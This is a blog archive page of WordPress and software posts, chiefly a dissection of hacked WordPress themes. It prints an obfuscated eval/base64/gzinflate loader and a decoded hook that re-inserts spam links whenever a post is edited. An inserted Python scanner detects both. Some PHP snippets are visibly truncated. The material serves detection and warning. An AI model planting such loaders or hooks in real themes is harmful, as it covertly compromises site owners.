Quick Tip: curreX version 0.9 released (with Flash Widget support)

Another quick announcement. I just released another version (0.9) of curreX – the Ajax based Currency Converter widget for WordPress.

Starting from this version, curreX also includes a Flash based widget and gives you the option of selecting between the HTML/JavaScript version and its Flash counterpart from the widget configuration panel of WordPress.

A quick preview of the flash widget can be obtained from here. I’m pretty bad at creating snazzy graphics in flash – so it’s going to take a while to make the widget look nice. The current version is fully functional though.

As always, I’m open for any questions / comments / bug reports.

Quick Tip: curreX v0.8 released

Here’s a quick tip for those who have been plagued with problems while using curreX v0.7 (the Ajax based Currency Converter Widget for WordPress). I’ve released a new version v0.8 yesterday, fixing most of those issues.

Please grab a copy from here or the WordPress plug-in repository and update your installation to fix all the earlier problems.

If you run into any problems with this version, there’s always the official curreX support forum.

Decided to give Defensio Anti-Spam a shot… over Akismet

Right since the beginning of my blogging career, I’ve been using Akismet in conjunction with Bad Behavior to weed out spam from my blog. Akismet was a natural choice since it comes bundled with WordPress installations. As for Bad Behavior, I decided to use it after reading plenty of articles on effective spam filtering.

Akismet has worked just fine for me so far. It has its occasional false positives (marking legit. comments as spam) – but I’m all right with it, since I don’t get much spam every day (a hundred at the most). While Akismet may be very good at catching spam, there’s one area where it needs to be revamped big time. The list of spam in Akismet is presented in a paginated manner while displaying the full body of each spam comment, making the list unnecessarily large and extremely tedious to go through. As I mentioned earlier – I don’t receive much spam every day. So, it’s relatively easy for me to wade through the list and pick out any false positives. However, imagine what a pain it must be for the larger blogs receiving thousands of spam comments every day. There’s a good chance of a fair number of legitimate comments going down the drain along with the spam flood. To make the situation worse, lately there have been a lot of complaints about Akismet producing more and more false positives.

After going through a bunch of reviews – both positive and negative, I decided to go ahead and give Defensio a try. For those who didn’t know, Defensio is a community-based anti-spam service similar to Akismet – but with certain added enhancements. They offer anti-spam solutions for a wide range of blogging platforms. It’s free for personal use while for commercial usage a nominal charge is levied on a per month basis.

Defensio sorts your quarantined comments by their “spaminess” value. This means that finding the occasional legitimate comment buried in your spambox (aka false positive) becomes dead easy: with Defensio you simply need to monitor the top portion of your quarantine to be confident that there’s no ham amongst your spam.

After I installed this plug-in, the first few spams that were caught were arranged into two distinct groups – Somewhat Spammy and Moderately Spammy. I’m yet to see the Super Spams… but I get the general idea.

A really nice feature of Defensio is that only the first line of the spam comment is shown (along with a link to display the full content). This makes for much better readability and sifting through the list. If you recall, I was grumbling about the lack of this in Akismet towards the beginning of this post. Score 1 for Defensio.

Before I forget, I’d like to mention one more contrasting point. When I had first installed Akismet and got my API key from WordPress.com, it gave me an insane amount of trouble to validate the key. This has been the same for any new blog I’ve helped install. For some reason, the validation wouldn’t go through for at least an hour following the registration at WordPress.com. However, with Defensio it was just click-and-go. Score 2.

Another distinct advantage of Defensio is that apart from the community anti-spam fighting feature, it operates on a blog-to-blog level.

This means that no two bloggers will see Defensio react in precisely the same way, even for similar comments, which is a good thing – because one person’s ham might be another person’s spam. And our continuously evolving set of algorithmic tricks ensures that we’ll never let spammers gain the upper hand.

Also available are RSS feeds of your comments and spam – which makes the monitoring less painful by removing the need to log in to the Admin Panel on a regular basis. The Defensio site keeps track of your spam statistics and presents nicely decked-up charts that summarize the evolution of spam and performance on your blog – a cool eye-candy feature to while your time away and “satisfy your inner bean-counter”.

Keep in mind, this is NOT an Akismet bashing post. I really respect the work of Matt and his team. They are the pioneers in this and without them – more than 80% of the WordPress based blogs wouldn’t see through a single day of Spam Attack. However, Defensio does offer a wider range of tools and features and that makes it a more viable option.

Now all I’ve got to see is how well it handles my spam. On the initial try, it did let two false negatives through – i.e. spam comments which passed as legitimate ones. But since this is its teething phase, I’m going to overlook that and give it a chance to evolve according to my comment preferences. Will report back in a couple of weeks’ time (or two) on how well it’s performing.

How about a personalised Firefox 3 Download Day Certificate?

Hopefully, by now you’ve grabbed your copy of Firefox 3 and consequently played an active role in helping our favourite browser set a new Guinness World Record. Here’s an added perk for being such an avid follower of Firefox – a personalised Firefox 3 Download Day Certificate stating your role in helping Firefox achieve the world record. I got mine just now and here’s what it looks like…

Firefox 3 Download Day Certificate

Getting the certificate is as easy as filling up this form (with just your name) and grabbing the generated PDF File.

Incidentally, I managed to grab my copy of Firefox 3 only today morning – almost 12 hours after the official release. Last night it was literally impossible to access any of the Firefox download sites due to the initial download rush.

Installation went smoothly and all my earlier settings & bookmarks were preserved – though a couple of extensions failed to work (Fasterfox, FEBE and TabMixPlus). None that I will sorely miss (for the time being), except for FEBE. On the good side, FF3 DOES take a shorter time to fire up. How about you? How was your initial experience with FF3?

Hurry… Get a Free Membership at a Premium WordPress Themes Club

WPDesigner Premium WordPress Themes Club - Free Membership

BlogAdda – an Indian blog showcase (directory) is giving away 100 free memberships to the Premium WordPress Themes Club of WPDesigner.

Normally, a one year membership of the club costs you $5, for which you get access to 12 premium themes (1 every month). As long as the offer from BlogAdda stands, you can get this for free. No sign-ups with BlogAdda are required. Simply read this post at the BlogAdda Blog, and leave a comment there stating your name & email correctly and include a link to the most popular post on your own blog.

They’ll get back to you in a day or two with a promotional code which you can use at the WPDesigner site to alleviate the charges for the first year.

Alternatively, you can follow BlogAdda on Twitter to claim your free membership.

I had left a comment there yesterday and by today noon I had my promotional code delivered to me. Last I checked, they had around 48 comments on that post (including comments from those who’re following BlogAdda on Twitter). If you hurry, you may still be accommodated in the last 50….

LC ISO Creator: Probably the smallest (and portable) no-frills ISO maker

Here’s a quick pointer. If you want a CD/DVD ISO Image Creator that does just what it’s intended to do, you should try this fantastic freeware named LC ISO Creator.

It’s this incredibly tiny download (14kb compressed) and runs straight out of box – i.e. no installation is required. It doesn’t require any crappy driver installation either. This can make it an invaluable addition to the PortableApps Suite.

LCISOCreator Screenshot

The interface is very minimalistic and doesn’t sport any Settings or Options dialog. It took me around 9 minutes to convert a 3GB DVD into its ISO counterpart – pretty good for such compact coding. It even supports Unicode. Your only qualm might be that it cannot handle copy-protected discs. Who cares! There are plenty of specialised tools for that.

This one’s headed straight for my PortableApps folder on my USB key.

Your last chance to help Firefox set a new Guinness World Record

For those who didn’t know, the guys at Mozilla are reaching out for a new Guinness World Record for the most downloaded software in a span of 24 hours – with the support of its million plus fan base.

The software which will strive for this record is the all new Firefox 3 (with more than 15,000 improvements), which is being launched on the 17th of June, 2008, i.e. tomorrow. This day has been named the Download Day and the guys at Mozilla want to see the download counter shooting through the roof, far surpassing the 2 million plus downloads of Firefox 2.

In the wake of this launch, quite a few authors have updated their extensions to work smoothly with this new release (for example, Google Toolbar). That’ll ensure that you aren’t left stranded with just the browser minus all the enhanced functionality.

If you’re a fanatical Firefox follower (like me), make sure you drop by the Firefox 3 Headquarters and pledge yourself for the download. They’ve got this cool interactive flash-based World Map there, displaying the number of pledges on a per country basis.

Chaotica: New theme for Chaos Laboratory

Finally got around to doing something that has been pending for ages… i.e. giving the site its own look & feel.

There are plenty of good WordPress themes around – but almost all are overused. I needed something fresh and unique (if possible). I had contacted a few designers but their starting prices ranged $300 to $400 – something that I would rather spend on getting better hosting (dedicated server maybe) or on advertising. In the end, what had to be done – had to be done. Got down on my hands and knees and started designing one on my own.

Adobe (formerly Macromedia) Fireworks helped me a long way in designing all the graphics for the theme. Thanks to Twitch for the logo (lab flasks) – that really brightened up the page.

Once the initial issues with the CSS were sorted out, it was time to port it to WordPress. That was the easier part though and you can see the result proudly on display here. Incidentally, I decided to name it “Chaotica”. Yeah, I know – it’s pretty cliché. But that’s the best I could come up with, keeping at par with my site name. Maybe you can suggest a better alternative for me!

There’s plenty of “cool stuff” that I’m yet to implement – but whatever I’ve put up so far isn’t bad for a first-timer! What do you say?

Been busy designing a new theme for Chaos Laboratory

A quick note to everyone… I’m coming up with a leaner and meaner theme for Chaos Laboratory. I’m almost done. Should be able to unleash it in a day …or two, at the most. Learnt a hell lot in the process – both CSS and WordPress Theme design wise – not to mention, bending some popular plug-ins to work the way I want.

My own plug-ins – namely, LiveSig and curreX are both in need of critical updates which I plan to do over the weekend. Till then 🙂

Dissection of a hacked WordPress Theme (how the hacked themes inject links and how to detect them)

While I was away on my sabbatical (read: coping with all-new fatherhood), I occasionally managed to catch a glimpse of the latest action dramas unfolding on the net – primarily because the WordPress dashboard made it a point to present them to me on a daily basis. One of them caught my fancy and I decided to take a deeper look. The topic was Technorati & hacked WordPress blogs. More than Technorati, it was the article on Weblog Tools Collection that got me wondering…

The premises

While I had made it a point to keep abreast with the WordPress releases and firmly believed that my blog wasn’t affected by this, I wasn’t quite so sure about a couple of other blogs that I had installed for my friends / clients. Going through a few of them, I noticed that all of them had a profuse amount of random & unrelated links in their footer besides containing links to a group of common sites in their blogroll. While the footer links were more or less random (and still acceptable), I couldn’t believe that, strangers as they were, all my friends & clients had managed to put their heads together and point to the same group of sites! Naturally, I got asking and found out that none of them had ever added those links in person and that even they were confused as to where they came from. Being new to blogging most of them had taken it for granted that those links were a part of the WordPress ring and had been placed there as a reciprocating gesture for providing such a terrific blogging platform for free.

The investigation

My first step was to dig into the file footer.php, where I encountered this strange sequence of code. Here’s an example…

<?php $Gdb63b0c686622a27d0bdb237219e0e96='jZNNa9wwEIbPXch/
eval(gzinflate(base64_decode($Gdb63b0c686622a27d0bdb237219e0e96))); ?>

Looks scary, doesn’t it? 😀 Managed to give me a fright at first sight too. Whereas I was expecting a bunch of hard-coded links, you get this!! Fear not. A second glance will tell you that the code isn’t really as mumbo-jumbo-ish as it looks. It contains 2 distinct php statements. The first one is simply the assignment of the scrambled sequence of characters to a horribly named variable, i.e. $Gdb63b0c686622a27d0bdb237219e0e96.

<?php $Gdb63b0c686622a27d0bdb237219e0e96='jZNNa9wwEIbPXch/

This statement alone didn’t make much sense though. It was the second statement, with its share of nested functions, that started shedding light on the whole issue…

eval(gzinflate(base64_decode($Gdb63b0c686622a27d0bdb237219e0e96))); ?>

If you’re familiar with php even a bit, you’ll begin to realise that this statement decodes whatever nastiness is lurking in the first line and executes it using the eval() statement. Before eval() ever sees it, the payload is unwrapped in that order: base64_decode() undoes the base64 encoding (the same encoding that is applied to email attachments) and gzinflate() then undoes the compression.

To really get behind the mystery code, you need to be able to SEE it. Rather simple. Just replace the eval() statement with an echo and it’ll spit the code out onto your screen instead of executing it. Following that, we modify the code block to look like this…

<?php $Gdb63b0c686622a27d0bdb237219e0e96='jZNNa9wwEIbPXch/
echo gzinflate(base64_decode($Gdb63b0c686622a27d0bdb237219e0e96));

Save this code in a new php file and execute it from your local php-enabled web-server installation (in my case XAMPP) and here’s what you get…


<?php wp_footer(); ?>

Pretty much the kind of code you’d expect in a WordPress theme footer. While one can accept the link to http://wordpressthemes.weblogs.us as the default link to the theme hosting service, I couldn’t understand what Vacation Reality had to do with it. Still, so much for the footer. All I had to do now was to remove the whole block of code and create a clean footer as specified by my clients.

The second complaint was regarding those common links that kept appearing in the blogroll. As it turned out, some of my clients had tried deleting those links only to have them re-appear a couple of hours down the line. Time to investigate again. This time it was the file functions.php. Didn’t have to look far. A search for the terms eval and base64 got me to the desired point. Once again I faced a block of code that went like…

<?php }

Taking the same road as the first time fetched me this very interesting block of code..

function insert_theme_link() {
    global $wpdb;
    // only insert the link if it isn't already in the blogroll (wp_links table)
    if($wpdb->get_var("SELECT COUNT(link_id) FROM $wpdb->links WHERE link_url='http://www.wordpresssupplies.com'")==0)
        wp_insert_link(array("link_name" => "Wordpress Themes", "link_url" => "http://www.wordpresssupplies.com" ));
}
// run the function every time a post is edited
add_action( "edit_post","insert_theme_link" );

The code should be fairly self-explanatory. What we have is a function named insert_theme_link that adds a link to wordpresssupplies.com to your blogroll (contained in the table wp_links in the WordPress database), if the link isn’t present. The noteworthy line here is add_action( "edit_post","insert_theme_link" ).

The add_action function is a plug-in API hook for WordPress.

  • The first parameter dictates which WordPress action to hook or watch out for.
  • The second parameter is the name of the function that is called when the hooked action occurs.

In our case, the action is edit_post, i.e. whenever the blog author edits a post, the function that adds the link to the blogroll is executed. Hence the mysteriously re-appearing link!
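A defender-side scanner for the two indicators dissected above, added here as an example and not code from the post: it unwraps eval(gzinflate(base64_decode())) blocks without executing them (Python’s zlib with wbits=-15 is the equivalent of PHP’s gzinflate()) and flags add_action hooks whose callback calls wp_insert_link. The functions.php it scans is constructed inline with a placeholder URL, and it goes one step beyond the post by repeating the unwrap when the revealed code is itself another wrapped eval.

```python
import base64
import re
import zlib

# Constructed sample (not the post's code); the link URL is a placeholder, not a real site.
INNER_PAYLOAD = (
    "function insert_theme_link() {\n"
    "    global $wpdb;\n"
    '    wp_insert_link(array("link_name" => "Themes", "link_url" => "http://spam.invalid"));\n'
    "}\n"
    'add_action("edit_post", "insert_theme_link");\n'
)

def gzdeflate_b64(text):
    """Wrap text the way the injector does: PHP gzdeflate() (raw DEFLATE), then base64."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(comp.compress(text.encode()) + comp.flush()).decode()

# Constructed functions.php with the same shape as the one dissected above.
SAMPLE_FUNCTIONS_PHP = ("<?php\n$Gabc123='" + gzdeflate_b64(INNER_PAYLOAD) + "';\n"
                        "eval(gzinflate(base64_decode($Gabc123)));\n?>\n")

EVAL_RE = re.compile(r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*(\$\w+)\s*\)", re.I)
HOOK_RE = re.compile(r"""add_action\s*\(\s*["']([\w-]+)["']\s*,\s*["'](\w+)["']""", re.I)

def gzinflate(data):
    """Python equivalent of PHP gzinflate(): raw DEFLATE, no zlib/gzip header (wbits=-15)."""
    return zlib.decompress(data, -15)

def decode_payload(src, max_layers=5):
    """The 'echo instead of eval' trick without running anything; repeats for nested wrappers."""
    layers = 0
    while layers < max_layers:
        m = EVAL_RE.search(src)
        if not m:
            break
        assign = re.search(re.escape(m.group(1)) + r"\s*=\s*'([A-Za-z0-9+/=]+)'", src)
        if not assign:
            break
        src = gzinflate(base64.b64decode(assign.group(1))).decode("utf-8", "replace")
        layers += 1
    return src if layers else None

def link_injecting_hooks(php):
    """(action, callback) pairs whose callback writes to the blogroll, like the edit_post hook."""
    hits = []
    for action, func in HOOK_RE.findall(php):
        body = re.search(r"function\s+" + func + r"\s*\([^)]*\)\s*\{(.*?)\n\}", php, re.S)
        if body and "wp_insert_link" in body.group(1):
            hits.append((action, func))
    return hits

def scan_theme_file(src):
    """Report both indicators from the post: an obfuscated eval and a blogroll-writing hook."""
    payload = decode_payload(src)
    return {
        "obfuscated_eval": payload is not None,
        "decoded": payload,
        "link_injecting_hooks": link_injecting_hooks(src) + link_injecting_hooks(payload or ""),
    }
```

Run scan_theme_file() over each theme file’s contents; a clean footer such as the wp_footer() call above reports neither indicator.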

The nexus

Hot on the trail, I decided to follow the link that was being injected here, i.e. wordpresssupplies.com – just to make sure this wasn’t a random case and that I am not tarnishing their reputation by unjustifiably pointing fingers at them. I dropped by their site and picked 3-4 themes from different categories. And what do I find? Every single one of them contained similar code – both in the footer as well as in functions.php. Not just that – studying the links led me to two other sites teeming with hacked themes. For your convenience (and warning) I’m listing them here.

  • http://www.amazingwordpressthemes.com/
  • http://wordpressthemes.weblogs.us/

All of them are nicely decked-up and look like legit. WordPress theme sites. But be wary of any themes that you download and use from these sites for they’re certain to contain such code blocks. Apart from these links, you may also notice some other random links being injected – links to car loan sites, cheap dedicated servers etc. – shady businesses which have probably paid the hacked theme sites to insert their links and thus gain PR (pagerank) out of millions of unsuspecting sites utilising these themes.

I tried doing a WHOIS on these domains, but that’s where I hit a wall. They’re either cloaked with Privacy Protect or contain spurious information regarding their owners. But I have a feeling that under the hood, these spammers (I prefer the term spammers here to hackers – as the people who’ve injected this code into the theme are nothing but link spammers) belong to the same group, or it’s the work of a lone individual.

The Filipino blogger Yuga outlines a couple of other methods followed by these spammers to capture / break your WordPress installation. The article is a must read.

The conclusion

On a sidenote, these themes can still be used if you carefully snip the spammy code out. Normally, the code-block in functions.php can be entirely eliminated without affecting the theme at all. As for the ones in footer.php, you’ll have to study the underlying code and eliminate the links to these sites, keeping the rest.

For those who want to experiment with such themes, I’m listing a few here for direct downloads. Disabling these themes or switching to another one will (normally) get rid of the injector code – but even then, USE AT YOUR OWN RISK.

If you manage to dig-up any other hacked theme sites like these, make sure you leave a comment enlisting them. It’ll serve as a warning note to all those who read this. And of course, if you have any thoughts to share on this issue, feel free…